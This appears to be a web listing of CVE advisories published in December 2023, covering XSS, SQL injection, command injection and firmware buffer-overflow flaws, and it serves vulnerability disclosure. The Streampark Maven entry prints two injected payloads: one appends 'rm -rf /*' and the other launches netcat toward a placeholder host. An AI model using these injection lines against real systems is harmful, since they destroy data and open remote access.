Security Vulnerabilities - CVEs Published In December 2023
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Till Krüss Email Address Encoder allows Stored XSS.This issue affects Email Address Encoder: from n/a through 1.0.22.
CVSS Score
6.5
EPSS Score
0.002
Published
2023-12-15
In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The sql syntax :select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage.
Mitigation:
Users are recommended to upgrade to version 2.1.2, which fixes the issue.
CVSS Score
4.9
EPSS Score
0.003
Published
2023-12-15
In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Mitigation:
all users should upgrade to 2.1.2
Example:
##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&":
/usr/share/java/maven-3/conf/settings.xml || rm -rf /*
/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &
CVSS Score
7.2
EPSS Score
0.019
Published
2023-12-15
When handling contactless cards, usage of a specific function to get additional information from the card which doesn't
check the boundary on the data received while reading. This allows a stack-based buffer overflow that could lead to a
potential Remote Code Execution on the targeted device
CVSS Score
6.8
EPSS Score
0.051
Published
2023-12-15
The Parameter Zone Read and Parameter Zone Write command handlers allow performing a Stack buffer overflow.
This could potentially lead to a Remote Code execution on the targeted device.
CVSS Score
9.1
EPSS Score
0.012
Published
2023-12-15
The handler of the retrofit validation command doesn't properly check the boundaries when performing certain validation
operations. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the
targeted device
CVSS Score
9.1
EPSS Score
0.009
Published
2023-12-15
During the retrofit validation process, the firmware doesn't properly check the boundaries while copying some attributes
to check. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted
device
CVSS Score
9.1
EPSS Score
0.013
Published
2023-12-15
When reading DesFire keys, the function that reads the card isn't properly checking the boundaries when copying
internally the data received. This allows a heap based buffer overflow that could lead to a potential Remote Code
Execution on the targeted device. This is especially problematic if you use Default DESFire key.
CVSS Score
6.8
EPSS Score
0.007
Published
2023-12-15
Due to improper error handling, a REST API resource could expose a server side error containing an internal WSO2 specific package name in the HTTP response.
CVSS Score
5.3
EPSS Score
0.003
Published
2023-12-15
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
CVSS Score
5.4
EPSS Score
0.01
Published
2023-12-15